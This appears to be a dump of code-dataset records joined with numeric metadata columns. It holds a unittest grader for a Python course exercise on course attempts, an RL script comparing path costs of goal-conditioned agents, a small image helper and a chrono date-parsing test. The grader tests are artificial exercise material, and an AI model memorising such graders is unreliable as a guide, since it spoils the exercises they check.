        self.assertTrue(uses_map, "Function names_of_students(attempts: list) must use map!")

    @points('12.attempted_courses_part1')
    def test_05_names_of_students_works_2(self):
        from src.attempted_courses import names_of_students
        from src.attempted_courses import CourseAttempt
        code = """
s1 = CourseAttempt("Peter Python", "Introduction to Programming", 3)
s2 = CourseAttempt("Paula Programmer", "Introduction to Programming", 5)
s3 = CourseAttempt("Peter Python", "Advanced Programming", 2)
s4 = CourseAttempt("Hector Helastic", "Introduction to Programming", 3)
s5 = CourseAttempt("Lady Gaga", "Introduction to Programming", 5)
s6 = CourseAttempt("Eila Karkki", "Advanced Programming", 2)
names_of_students([s1, s2, s3, s4, s5, s6])
"""
        try:
            s1 = CourseAttempt("Peter Python", "Introduction to Programming", 3)
            s2 = CourseAttempt("Paula Programmer", "Introduction to Programming", 5)
            s3 = CourseAttempt("Peter Python", "Advanced Programming", 2)
            s4 = CourseAttempt("Hector Helastic", "Introduction to Programming", 3)
            s5 = CourseAttempt("Lady Gaga", "Introduction to Programming", 5)
            s6 = CourseAttempt("Eila Karkki", "Advanced Programming", 2)
            response = names_of_students([s1, s2, s3, s4, s5, s6])
        except:
            self.fail(f"Check that the following code can be executed\n{code}")
        exp = [attempt.student_name for attempt in [s1, s2, s3, s4, s5, s6]]
        output = ""
        vast = []
        for n in response:
            output += n + "\n"
            vast.append(n)
        self.assertEqual(sorted(vast), sorted(exp), f"When this code is executed {code}it should return \n{s(exp)}\nnow the function returns\n{output}")

    @points('12.attempted_courses_part2')
    def test_06_function_course_names_exists(self):
        try:
            from src.attempted_courses import course_names
        except:
            self.fail("Your program should have a function called course_names(attempts: list)")

    @points('12.attempted_courses_part2')
    def test_07_course_names_return_type(self):
        from src.attempted_courses import course_names
        from src.attempted_courses import CourseAttempt
        code = """
s1 = CourseAttempt("Peter Python", "Introduction to Programming", 3)
s2 = CourseAttempt("Paula Programmer", "Introduction to Programming", 5)
s3 = CourseAttempt("Peter Python", "Advanced Programming", 2)
course_names([s1, s2, s3])
"""
        try:
            s1 = CourseAttempt("Peter Python", "Introduction to Programming", 3)
            s2 = CourseAttempt("Paula Programmer", "Introduction to Programming", 5)
            s3 = CourseAttempt("Peter Python", "Advanced Programming", 2)
            response = course_names([s1, s2, s3])
        except:
            self.fail(f"Check that the following code can be executed\n{code}")
        taip = str(type(response)).replace("<class '", "").replace("'>", "")
        # A set is also accepted since the course names must be unique.
        self.assertTrue(isinstance(response, (map, list, set)), f"Function course_names(attempts: list) should return map or list, now the return value was of type {taip}")
        for alkio in response:
            etaip = str(type("")).replace("<class '", "").replace("'>", "")
            taip = str(type(alkio)).replace("<class '", "").replace("'>", "")
            self.assertTrue(isinstance(alkio, str), f"When this code is executed {code}the values returned should be of type {etaip} now the type is {taip}")

    @points('12.attempted_courses_part2')
    def test_08_course_names_works_1(self):
        from src.attempted_courses import course_names
        from src.attempted_courses import CourseAttempt
        code = """
s1 = CourseAttempt("Peter Python", "Introduction to Programming", 3)
s2 = CourseAttempt("Paula Programmer", "Introduction to Programming", 5)
s3 = CourseAttempt("Peter Python", "Advanced Programming", 2)
course_names([s1, s2, s3])
"""
        try:
            s1 = CourseAttempt("Peter Python", "Introduction to Programming", 3)
            s2 = CourseAttempt("Paula Programmer", "Introduction to Programming", 5)
            s3 = CourseAttempt("Peter Python", "Advanced Programming", 2)
            response = course_names([s1, s2, s3])
        except:
            self.fail(f"Check that the following code can be executed\n{code}")
        taip = str(type(response)).replace("<class '", "").replace("'>", "")
        self.assertTrue(isinstance(response, (map, list, set)), f"Function course_names(attempts: list) should return map or list, now the return value was of type {taip}")
        # Materialize so the (possibly single-use) map can be iterated twice.
        response = list(response)
        for alkio in response:
            etaip = str(type("")).replace("<class '", "").replace("'>", "")
            taip = str(type(alkio)).replace("<class '", "").replace("'>", "")
            self.assertTrue(isinstance(alkio, str), f"When this code is executed {code}the values returned should be of type {etaip} now the type is {taip}")
        # Expected: each distinct course name exactly once.
        exp = sorted(set(attempt.course_name for attempt in [s1, s2, s3]))
        output = ""
        vast = []
        for n in response:
            output += n + "\n"
            vast.append(n)
        self.assertEqual(sorted(vast), sorted(exp), f"When this code is executed {code}should return course names \n{s(exp)}\nnow the function returns\n{output}")

    @points('12.attempted_courses_part2')
    def test_09_course_names_uses_map(self):
        # Slice the body of course_names out of the source file and require
        # that it mentions map.
        src_file = os.path.join('src', 'attempted_courses.py')
        lines = []
        inside = False
        with open(src_file) as source:
            for line in source:
                if "def course_names" in line:
                    inside = True
                elif inside and ('__name__ == "__main__":' in line or "def course_names" in line):
                    inside = False
                elif inside:
                    lines.append(line)
        uses_map = any("map" in line for line in lines)
        self.assertTrue(uses_map, "Function course_names(attempts: list) must use map!")

    @points('12.attempted_courses_part2')
    def test_10_course_names_works_2(self):
        from src.attempted_courses import course_names
        from src.attempted_courses import CourseAttempt
        code = """
s1 = CourseAttempt("Peter Python", "Introduction to Programming", 3)
s2 = CourseAttempt("Paula Programmer", "Introduction to Programming", 5)
s3 = CourseAttempt("Peter Python", "Algorithms", 2)
s4 = CourseAttempt("Hector Helastic", "Full stack", 3)
s5 = CourseAttempt("Lady Gaga", "Advanced Programming", 5)
s6 = CourseAttempt("Eila Karkki", "Data Communications 1", 2)
course_names([s1, s2, s3, s4, s5, s6])
"""
        try:
            s1 = CourseAttempt("Peter Python", "Introduction to Programming", 3)
            s2 = CourseAttempt("Paula Programmer", "Introduction to Programming", 5)
            s3 = CourseAttempt("Peter Python", "Algorithms", 2)
            s4 = CourseAttempt("Hector Helastic", "Full stack", 3)
            s5 = CourseAttempt("Lady Gaga", "Advanced Programming", 5)
            s6 = CourseAttempt("Eila Karkki", "Data Communications 1", 2)
            response = course_names([s1, s2, s3, s4, s5, s6])
        except:
            self.fail(f"Check that the following code can be executed\n{code}")
        exp = sorted(set(attempt.course_name for attempt in [s1, s2, s3, s4, s5, s6]))
        output = ""
        vast = []
        for n in response:
            output += n + "\n"
            vast.append(n)
        self.assertEqual(sorted(vast), sorted(exp), f"When this code is executed {code}it should return courses\n{s(exp)}\nnow the function returns\n{output}")
# Allow running this test module directly: `python test_attempted_courses.py`.
if __name__ == '__main__':
    unittest.main()
| 41.77
| 214
| 0.624611
| 1,549
| 12,531
| 4.93286
| 0.120723
| 0.051302
| 0.091611
| 0.042141
| 0.875802
| 0.868734
| 0.862714
| 0.831436
| 0.813899
| 0.797409
| 0
| 0.023362
| 0.251935
| 12,531
| 299
| 215
| 41.909699
| 0.791764
| 0
| 0
| 0.770492
| 0
| 0.040984
| 0.397095
| 0.041657
| 0
| 0
| 0
| 0
| 0.057377
| 1
| 0.057377
| false
| 0
| 0.098361
| 0.004098
| 0.168033
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
792ba341df25f49690b1611eccd3ddee9ba01581
| 76
|
py
|
Python
|
src/vps/netvlad/ccsmmutils/__init__.py
|
deepguider/RoadGPS
|
7db4669a54da98a854886b89b6922fb8c7a60f33
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 2
|
2019-05-22T12:47:34.000Z
|
2019-05-23T15:43:47.000Z
|
src/vps/netvlad/ccsmmutils/__init__.py
|
deepguider/RoadGPS
|
7db4669a54da98a854886b89b6922fb8c7a60f33
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/vps/netvlad/ccsmmutils/__init__.py
|
deepguider/RoadGPS
|
7db4669a54da98a854886b89b6922fb8c7a60f33
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 1
|
2019-08-09T06:50:46.000Z
|
2019-08-09T06:50:46.000Z
|
from .img_utils import concat_images
from .img_utils import concat_n_images
| 25.333333
| 38
| 0.868421
| 13
| 76
| 4.692308
| 0.538462
| 0.229508
| 0.393443
| 0.590164
| 0.786885
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 76
| 2
| 39
| 38
| 0.897059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
f71bfd5b0f2615891de5ac70368d3a37c96767b7
| 17,386
|
py
|
Python
|
HER_mod/rl_modules/get_path_costs.py
|
schrammlb2/policy-guided-sst
|
8dce6619b9c771c39915c60fe9c54270ea1e621e
|
[
"Apache-2.0"
] | null | null | null |
HER_mod/rl_modules/get_path_costs.py
|
schrammlb2/policy-guided-sst
|
8dce6619b9c771c39915c60fe9c54270ea1e621e
|
[
"Apache-2.0"
] | null | null | null |
HER_mod/rl_modules/get_path_costs.py
|
schrammlb2/policy-guided-sst
|
8dce6619b9c771c39915c60fe9c54270ea1e621e
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
import pickle
import os
from scipy import stats
from HER_mod.rl_modules.tsp import generate_path
from HER_mod.rl_modules.hyperparams import NUM_GOALS, NUM_AGENTS
# Gradient-descent step budgets evaluated by every comparison below.
gd_step_list = [0, 2, 5, 10, 20, 40]
# NUM_AGENTS = 3
# Number of random evaluation episodes per trained agent.
N = 200
def get_path_costs(train_pos_agent, train_vel_agent, perm_search=True):
    """Compare position-only agents against velocity-target agents.

    Trains NUM_AGENTS agents of each kind, measures trajectory lengths on N
    random multi-goal tasks for every gradient-step budget in
    ``gd_step_list``, pickles the raw timings, and saves a plot of the mean
    relative improvement (with a 95% t-based confidence band) to
    results/Relative Improvement.png.

    Args:
        train_pos_agent: zero-argument factory returning a trained
            position-only agent.
        train_vel_agent: zero-argument factory returning a trained
            velocity-target agent.
        perm_search: forwarded to ``find_shortest_path``; presumably whether
            to search over goal-visit permutations -- confirm in tsp module.
    """
    num_agents = NUM_AGENTS
    num_goals = NUM_GOALS
    n = N
    pos_time_list = []
    vel_time_list = []
    for _ in range(num_agents):
        pos_agent = train_pos_agent()
        vel_agent = train_vel_agent()
        pos_agent_time_list = []
        vel_agent_time_list = []
        for i in range(n):
            # First waypoint is the start position; the final element of the
            # generated path is dropped, the rest are the goals.
            goals = generate_path(num_goals + 1)
            pos = goals[0]
            goals = goals[1:-1]
            # Baseline: the position agent ignores gradient steps, so its
            # timing is replicated across every step budget.
            min_time, min_trajectory, min_path, min_vel_path, successful, pass_vals = pos_agent.find_shortest_path(pos, goals, gd_steps=0, perm_search=perm_search)
            pos_test_time_list = [len(min_trajectory)] * len(gd_step_list)
            pos_agent_time_list.append(pos_test_time_list)
            vel_test_time_list = []
            for gd_steps in gd_step_list:
                min_time, min_trajectory, min_path, min_vel_path, successful, pass_vals = vel_agent.find_shortest_path(pos, goals, gd_steps=gd_steps, perm_search=perm_search)
                vel_test_time_list.append(len(min_trajectory))
            vel_agent_time_list.append(vel_test_time_list)
        pos_time_list.append(pos_agent_time_list)
        vel_time_list.append(vel_agent_time_list)
    vel_time_list = np.array(vel_time_list).squeeze()
    pos_time_list = np.array(pos_time_list).squeeze()
    # Per-task relative change, averaged over tasks for each agent.
    relative_time_change = (vel_time_list - pos_time_list) / pos_time_list
    relative_time_change = np.mean(relative_time_change, axis=1)
    try:
        # `with` blocks fix the leaked file handles the old
        # `pickle.dump(obj, open(...))` pattern left behind.
        with open("velocity_target.pkl", 'wb') as fh:
            pickle.dump(vel_time_list, fh)
        with open("no_velocity_target.pkl", 'wb') as fh:
            pickle.dump(pos_time_list, fh)
        with open("relative_time_change.pkl", 'wb') as fh:
            pickle.dump(relative_time_change, fh)
    except Exception:
        # Best effort: the plot below is still useful without the dumps.
        # (A leftover pdb.set_trace() breakpoint was removed here -- it
        # would hang unattended runs.)
        print("pickle failure")
    mean = relative_time_change.mean(axis=0)
    t_score = stats.t.ppf(.975, num_agents)
    ci = t_score * relative_time_change.std(axis=0) / (num_agents ** .5)
    steps = np.array(gd_step_list)
    plt.plot(steps, mean)
    plt.fill_between(steps, mean + ci, mean - ci, alpha=.4)
    plt.xlabel("Gradient steps")
    plt.ylabel("Relative Improvement vs standard HER")
    plt.title("Relative Improvement")
    plt.savefig(os.path.join('results', "Relative Improvement" + '.png'))
    plt.close()
# def method_comparison(train_pos_agent, train_vel_agent):
# # method_list = ['random search', "gradient descent", "gradient descent (40 steps)", "random", "0 velocity target"]
# method_list = ['random search', "gradient descent", "random", "0 velocity target"]
# method_runtime_dict = {'greedy': []}
# for method in method_list:
# method_runtime_dict[method] = []
# num_agents = NUM_AGENTS
# num_goals=NUM_GOALS
# n=N
# pos_time_list = []
# vel_time_list = []
# for _ in range(num_agents):
# pos_agent = train_pos_agent()
# vel_agent = train_vel_agent()
# for method in method_runtime_dict.keys():
# method_runtime_dict[method].append([])
# for i in range(n):
# # goals = [np.random.rand(2)*2-1 for i in range(num_goals)]
# # pos = np.random.rand(2)*2-1
# goals = generate_path(num_goals + 1)
# pos = goals[0]
# goals = goals[1:-1]
# # pos_agent_time_list = []
# min_time, min_trajectory, min_path, min_vel_path, successful, pass_vals = pos_agent.select_path(pos, goals, method="0 velocity target")
# # pos_test_time_list = [len(min_trajectory)]*len(gd_step_list)
# method_runtime_dict['greedy'][-1].append(len(min_trajectory))
# # vel_test_time_list = []
# for method in method_list:
# min_time, min_trajectory, min_path, min_vel_path, successful, pass_vals = vel_agent.select_path(pos, goals, method=method)
# method_runtime_dict[method][-1].append(len(min_trajectory))
# # vel_agent_time_list.append(vel_test_time_list)
# greedy = method_runtime_dict['greedy']
# method_runtime_dict = {method: np.array(method_runtime_dict[method]) for method in method_runtime_dict.keys()}
# performance_dict = {method: (method_runtime_dict[method].mean(), 2*(method_runtime_dict[method].mean(axis=-1)).std()/(num_agents**.5)) for method in method_runtime_dict.keys()}
# relative_time_dict = {method: (method_runtime_dict[method] - greedy)/greedy for method in method_list}
# improvement_dict = {method: (relative_time_dict[method].mean(), 2*(relative_time_dict[method].mean(axis=-1)).std()/(num_agents**.5)) for method in method_list}
# performance_list = [performance_dict[m][0] for m in method_runtime_dict.keys()]
# performance_ci_list = [performance_dict[m][1] for m in method_runtime_dict.keys()]
# relative_time_list = [improvement_dict[m][0] for m in method_list]
# relative_time_ci_list = [improvement_dict[m][1] for m in method_list]
# plt.xticks(range(len(method_runtime_dict.keys())), list(method_runtime_dict.keys()))
# plt.xlabel("Method")
# plt.ylabel('Time to complete')
# plt.title('Comparison of velocity target-setting methods')
# plt.bar(range(len(performance_list)), performance_list, yerr=performance_ci_list)
# plt.savefig(os.path.join('results', "Method comparison -- Performance" + '.png'))
# plt.close()
# plt.xticks(range(len(method_list)), method_list)
# plt.xlabel("Method")
# plt.ylabel('Cost reduction over greedy baseline')
# plt.title('Comparison of velocity target-setting methods')
# plt.bar(range(len(relative_time_list)), relative_time_list, yerr=relative_time_ci_list)
# plt.savefig(os.path.join('results', "Method comparison -- Relative Improvement" + '.png'))
# plt.close()
def method_comparison(train_pos_agent, train_vel_agent):
    """Benchmark velocity-target-setting methods against a greedy baseline.

    Runs every method in ``method_list`` plus the greedy "0 velocity target"
    baseline on N random tasks per agent, tracks failed episodes, and saves
    three bar charts under results/: success rate, mean completion time, and
    relative cost reduction over the greedy baseline.

    Args:
        train_pos_agent: zero-argument factory returning a trained
            position-only agent (used for the greedy baseline).
        train_vel_agent: zero-argument factory returning a trained
            velocity-target agent (used for every other method).
    """
    method_list = ['random search', "gradient descent", "gradient descent (40 steps)", "random", "0 velocity target"]
    method_runtime_dict = {'greedy': []}
    for method in method_list:
        method_runtime_dict[method] = []
    num_agents = NUM_AGENTS
    num_goals = NUM_GOALS
    n = N
    failed_counter_dict = {'greedy': 0}
    for method in method_list:
        failed_counter_dict[method] = 0
    for _ in range(num_agents):
        pos_agent = train_pos_agent()
        vel_agent = train_vel_agent()
        # One fresh per-agent episode list for every method.
        for method in method_runtime_dict.keys():
            method_runtime_dict[method].append([])
        for i in range(n):
            goals = generate_path(num_goals + 1)
            pos = goals[0]
            goals = goals[1:-1]
            # Greedy baseline: the position agent with a zero-velocity target.
            min_time, min_trajectory, min_path, min_vel_path, successful, pass_vals = pos_agent.select_path(pos, goals, method="0 velocity target")
            if successful:
                method_runtime_dict['greedy'][-1].append(len(min_trajectory))
            else:
                # "NULL" marks failed episodes; they are filtered out of the
                # statistics below.
                method_runtime_dict['greedy'][-1].append("NULL")
                failed_counter_dict['greedy'] += 1
            for method in method_list:
                min_time, min_trajectory, min_path, min_vel_path, successful, pass_vals = vel_agent.select_path(pos, goals, method=method)
                if successful:
                    method_runtime_dict[method][-1].append(len(min_trajectory))
                else:
                    method_runtime_dict[method][-1].append("NULL")
                    failed_counter_dict[method] += 1
    success_rates = {method: 1 - failed_counter_dict[method] / (num_agents * n) for method in failed_counter_dict.keys()}
    greedy = method_runtime_dict['greedy']
    agent_performance_dict = {}
    mean_performance_dict = {}
    ci_performance_dict = {}
    mean_improvement_dict = {}
    ci_improvement_dict = {}
    t_score = stats.t.ppf(.975, num_agents)
    for method in method_runtime_dict.keys():
        # Mean completion time per agent, ignoring failed ("NULL") episodes.
        agent_performance_dict[method] = [[time for time in agent_list if time != "NULL"] for agent_list in method_runtime_dict[method]]
        agent_performance_dict[method] = [sum(agent_list) / len(agent_list) for agent_list in agent_performance_dict[method]]
        mean = sum(agent_performance_dict[method]) / len(agent_performance_dict[method])
        mean_performance_dict[method] = mean
        ci_performance_dict[method] = t_score * sum([(v - mean) ** 2 for v in agent_performance_dict[method]]) ** .5 / len(agent_performance_dict[method])
        improvement_list = []
        mean_list = []
        for agent_ind in range(num_agents):
            agent_list = method_runtime_dict[method][agent_ind]
            greedy_list = greedy[agent_ind]
            # Relative cost change vs greedy, on episodes where both succeeded.
            improvement_list.append([(agent_list[i] - greedy_list[i]) / greedy_list[i] for i in range(n) if (agent_list[i] != "NULL" and greedy_list[i] != "NULL")])
            mean_list.append(sum(improvement_list[agent_ind]) / len(improvement_list[agent_ind]))
        mean = sum(mean_list) / len(mean_list)
        mean_improvement_dict[method] = mean
        ci_improvement_dict[method] = t_score * sum([(v - mean) ** 2 for v in mean_list]) ** .5 / len(mean_list)
    performance_list = [mean_performance_dict[m] for m in method_runtime_dict.keys()]
    performance_ci_list = [ci_performance_dict[m] for m in method_runtime_dict.keys()]
    relative_time_list = [mean_improvement_dict[m] for m in method_list]
    relative_time_ci_list = [ci_improvement_dict[m] for m in method_list]
    sr_list = [success_rates[m] for m in method_runtime_dict.keys()]
    # Chart 1: success rate per method (includes the greedy baseline).
    plt.xticks(range(len(method_runtime_dict.keys())), list(method_runtime_dict.keys()))
    plt.xlabel("Method")
    plt.ylabel('Success rate')
    plt.title('Comparison of velocity target-setting methods')
    plt.bar(range(len(sr_list)), sr_list)
    plt.savefig(os.path.join('results', "Method comparison -- Success Rate" + '.png'))
    plt.close()
    # Chart 2: mean completion time per method.
    plt.xticks(range(len(method_runtime_dict.keys())), list(method_runtime_dict.keys()))
    plt.xlabel("Method")
    plt.ylabel('Time to complete')
    plt.title('Comparison of velocity target-setting methods')
    plt.bar(range(len(performance_list)), performance_list, yerr=performance_ci_list)
    plt.savefig(os.path.join('results', "Method comparison -- Performance" + '.png'))
    plt.close()
    # Chart 3: relative cost reduction vs greedy (greedy itself excluded).
    plt.xticks(range(len(method_list)), method_list)
    plt.xlabel("Method")
    plt.ylabel('Cost reduction over greedy baseline')
    plt.title('Comparison of velocity target-setting methods')
    plt.bar(range(len(relative_time_list)), relative_time_list, yerr=relative_time_ci_list)
    plt.savefig(os.path.join('results', "Method comparison -- Relative Improvement" + '.png'))
    plt.close()
def get_random_search_costs(train_vel_agent, perm_search=True):
    """Compare gradient-descent target refinement against random search.

    For each gradient-step budget in ``gd_step_list`` the velocity-target
    agent plans the same N random tasks twice -- once with gradient descent
    and once with random search -- and two plots are saved under results/:
    the mean relative change and the absolute timings of both strategies
    with confidence bands.

    Args:
        train_vel_agent: zero-argument factory returning a trained
            velocity-target agent.
        perm_search: forwarded to ``find_shortest_path``.
    """
    num_agents = NUM_AGENTS
    num_goals = NUM_GOALS
    n = N
    rand_time_list = []
    gd_time_list = []
    for _ in range(num_agents):
        vel_agent = train_vel_agent()
        rand_search_time_list = []
        gd_search_time_list = []
        for i in range(n):
            goals = generate_path(num_goals + 1)
            pos = goals[0]
            goals = goals[1:-1]
            rand_test_time_list = []
            gd_test_time_list = []
            for gd_steps in gd_step_list:
                # Gradient-descent refinement from the deterministic start.
                min_time, min_trajectory, min_path, min_vel_path, successful, pass_vals = vel_agent.find_shortest_path(pos, goals, gd_steps=gd_steps, random_start=False, perm_search=perm_search)
                print("GD: " + str(min_time))
                gd_test_time_list.append(len(min_trajectory))
                # Random search with the same step budget.
                min_time, min_trajectory, min_path, min_vel_path, successful, pass_vals = vel_agent.find_shortest_path(pos, goals, gd_steps=gd_steps, random_search=True, perm_search=perm_search)
                print("random_search: " + str(min_time))
                rand_test_time_list.append(len(min_trajectory))
            rand_search_time_list.append(rand_test_time_list)
            gd_search_time_list.append(gd_test_time_list)
        rand_time_list.append(rand_search_time_list)
        gd_time_list.append(gd_search_time_list)
    rand_time_list = np.array(rand_time_list).squeeze()
    gd_time_list = np.array(gd_time_list).squeeze()
    relative_time_change = (gd_time_list - rand_time_list) / rand_time_list
    relative_time_change = np.mean(relative_time_change, axis=1)
    mean = relative_time_change.mean(axis=0)
    # NOTE(review): this band uses a fixed ~2-sigma multiplier while the
    # plot below uses a t-score; kept as-is to preserve the original output.
    ci = 2 * relative_time_change.std(axis=0) / (num_agents ** .5)
    steps = np.array(gd_step_list)
    plt.plot(steps, mean)
    plt.fill_between(steps, mean + ci, mean - ci, alpha=.4)
    plt.xlabel("Gradient steps")
    plt.ylabel("Relative Improvement vs random search")
    plt.title("Relative Improvement vs random search")
    plt.savefig(os.path.join('results', "Improvement vs random search" + '.png'))
    plt.close()
    t_score = stats.t.ppf(.975, num_agents)
    rands = rand_time_list.mean(axis=1)
    rand_mean = rands.mean(axis=0)
    rand_ci = t_score * rands.std(axis=0) / (num_agents ** .5)
    gds = gd_time_list.mean(axis=1)
    gd_mean = gds.mean(axis=0)
    gd_ci = t_score * gds.std(axis=0) / (num_agents ** .5)
    plt.plot(steps, rand_mean, color='red', label='Random Search')
    plt.fill_between(steps, rand_mean + rand_ci, rand_mean - rand_ci, alpha=.4, color='red')
    plt.plot(steps, gd_mean, color='blue', label='Gradient Descent')
    plt.fill_between(steps, gd_mean + gd_ci, gd_mean - gd_ci, alpha=.4, color='blue')
    plt.legend()
    plt.xlabel("Gradient steps")
    plt.ylabel("Relative Improvement vs random search")
    plt.title("Relative Improvement vs random search")
    plt.savefig(os.path.join('results', "Gradient Descent vs random search" + '.png'))
    plt.close()
| 44.352041
| 195
| 0.673588
| 2,464
| 17,386
| 4.429789
| 0.062906
| 0.057169
| 0.080989
| 0.050573
| 0.840312
| 0.785891
| 0.760055
| 0.741732
| 0.719285
| 0.684196
| 0
| 0.010883
| 0.201944
| 17,386
| 391
| 196
| 44.465473
| 0.775784
| 0.359312
| 0
| 0.4
| 1
| 0
| 0.091956
| 0.004172
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014634
| false
| 0.029268
| 0.039024
| 0
| 0.053659
| 0.014634
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f73330b38cff9d80573d59c85199da641ef2fb6b
| 114
|
py
|
Python
|
code_gazay/lenin/lenin/transforms.py
|
artyompal/kaggle_salt
|
3c323755730745ac7bbfd106f1f20919cceef0ee
|
[
"MIT"
] | null | null | null |
code_gazay/lenin/lenin/transforms.py
|
artyompal/kaggle_salt
|
3c323755730745ac7bbfd106f1f20919cceef0ee
|
[
"MIT"
] | 1
|
2021-03-25T23:31:26.000Z
|
2021-03-25T23:31:28.000Z
|
code_gazay/lenin/lenin/transforms.py
|
artyompal/kaggle_salt
|
3c323755730745ac7bbfd106f1f20919cceef0ee
|
[
"MIT"
] | 1
|
2018-11-08T09:30:38.000Z
|
2018-11-08T09:30:38.000Z
|
import numpy as np
def hwc_to_chw(image):
    """Reorder an HWC (height, width, channel) array to CHW (PyTorch layout)."""
    return np.transpose(image, (2, 0, 1))
| 22.8
| 70
| 0.692982
| 19
| 114
| 4.052632
| 0.736842
| 0.207792
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.201754
| 114
| 4
| 71
| 28.5
| 0.846154
| 0.210526
| 0
| 0
| 0
| 0
| 0.090909
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
f75b889c0884f0f87b025775427ec033600dae73
| 5,834
|
py
|
Python
|
tests/en/test_format_little_endian.py
|
wanasit/chrono-python
|
2e3bb44f876fc381a73050d9dda58de296306dc0
|
[
"MIT"
] | 20
|
2016-07-21T11:27:46.000Z
|
2022-01-30T16:12:46.000Z
|
tests/en/test_format_little_endian.py
|
wanasit/chrono-python
|
2e3bb44f876fc381a73050d9dda58de296306dc0
|
[
"MIT"
] | 2
|
2016-11-21T05:46:19.000Z
|
2019-03-23T06:41:21.000Z
|
tests/en/test_format_little_endian.py
|
wanasit/chrono-python
|
2e3bb44f876fc381a73050d9dda58de296306dc0
|
[
"MIT"
] | 5
|
2015-06-28T07:21:31.000Z
|
2020-07-28T19:54:29.000Z
|
import unittest
import chrono
from datetime import datetime
class LittleEndianFormatTest(unittest.TestCase):
def setUp(self):
    # No per-test fixtures are needed for these parser tests.
    pass
def test_little_endian(self):
results = chrono.parse('Test : 24 March 2013')
self.assertEqual(len(results), 1)
result = results[0]
self.assertEqual(result.index, 7)
self.assertEqual(result.text, '24 March 2013')
self.assertEqual(result.start.get('day'), 24)
self.assertEqual(result.start.get('month'), 3)
self.assertEqual(result.start.get('year'), 2013)
self.assertEqual(result.start.date(), datetime(2013, 3, 24, 12))
results = chrono.parse('Test : 24 Mar 2013')
self.assertEqual(len(results), 1)
result = results[0]
self.assertEqual(result.index, 7)
self.assertEqual(result.text, '24 Mar 2013')
self.assertEqual(result.start.get('day'), 24)
self.assertEqual(result.start.get('month'), 3)
self.assertEqual(result.start.get('year'), 2013)
self.assertEqual(result.start.date(), datetime(2013, 3, 24, 12))
results = chrono.parse('Test : 24 mar 2013')
self.assertEqual(len(results), 1)
result = results[0]
self.assertEqual(result.index, 7)
self.assertEqual(result.text, '24 mar 2013')
self.assertEqual(result.start.get('day'), 24)
self.assertEqual(result.start.get('month'), 3)
self.assertEqual(result.start.get('year'), 2013)
self.assertEqual(result.start.date(), datetime(2013, 3, 24, 12))
results = chrono.parse('Test : 24 Mar', datetime(2012,3,22))
self.assertEqual(len(results), 1)
result = results[0]
self.assertEqual(result.index, 7)
self.assertEqual(result.text, '24 Mar')
self.assertEqual(result.start.get('day'), 24)
self.assertEqual(result.start.get('month'), 3)
self.assertEqual(result.start.get('year'), 2012)
self.assertEqual(result.start.date(), datetime(2012, 3, 24, 12))
results = chrono.parse('Test : 24 March, test', datetime(2000,10,1))
self.assertEqual(len(results), 1)
result = results[0]
self.assertEqual(result.index, 7)
self.assertEqual(result.text, '24 March')
self.assertEqual(result.start.get('day'), 24)
self.assertEqual(result.start.get('month'), 3)
self.assertEqual(result.start.get('year'), 2001)
self.assertEqual(result.start.date(), datetime(2001, 3, 24, 12))
def test_little_endian_range(self):
results = chrono.parse('Test : 24 - 25 Mar', datetime(2012,3,22))
self.assertEqual(len(results), 1)
result = results[0]
self.assertEqual(result.index, 7)
self.assertEqual(result.text, '24 - 25 Mar')
self.assertEqual(result.start.get('day'), 24)
self.assertEqual(result.start.get('month'), 3)
self.assertEqual(result.start.get('year'), 2012)
self.assertEqual(result.start.date(), datetime(2012, 3, 24, 12))
self.assertEqual(result.end.get('day'), 25)
self.assertEqual(result.end.get('month'), 3)
self.assertEqual(result.end.get('year'), 2012)
self.assertEqual(result.end.date(), datetime(2012, 3, 25, 12))
results = chrono.parse('Test : 24 - 25 Mar 2014', datetime(2012,3,22))
self.assertEqual(len(results), 1)
result = results[0]
self.assertEqual(result.index, 7)
self.assertEqual(result.text, '24 - 25 Mar 2014')
self.assertEqual(result.start.get('day'), 24)
self.assertEqual(result.start.get('month'), 3)
self.assertEqual(result.start.get('year'), 2014)
self.assertEqual(result.start.date(), datetime(2014, 3, 24, 12))
self.assertEqual(result.end.get('day'), 25)
self.assertEqual(result.end.get('month'), 3)
self.assertEqual(result.end.get('year'), 2014)
self.assertEqual(result.end.date(), datetime(2014, 3, 25, 12))
results = chrono.parse('Test : 24 Feb - 2 Mar 2014', datetime(2012,3,22))
self.assertEqual(len(results), 1)
result = results[0]
self.assertEqual(result.index, 7)
self.assertEqual(result.text, '24 Feb - 2 Mar 2014')
self.assertEqual(result.start.get('day'), 24)
self.assertEqual(result.start.get('month'), 2)
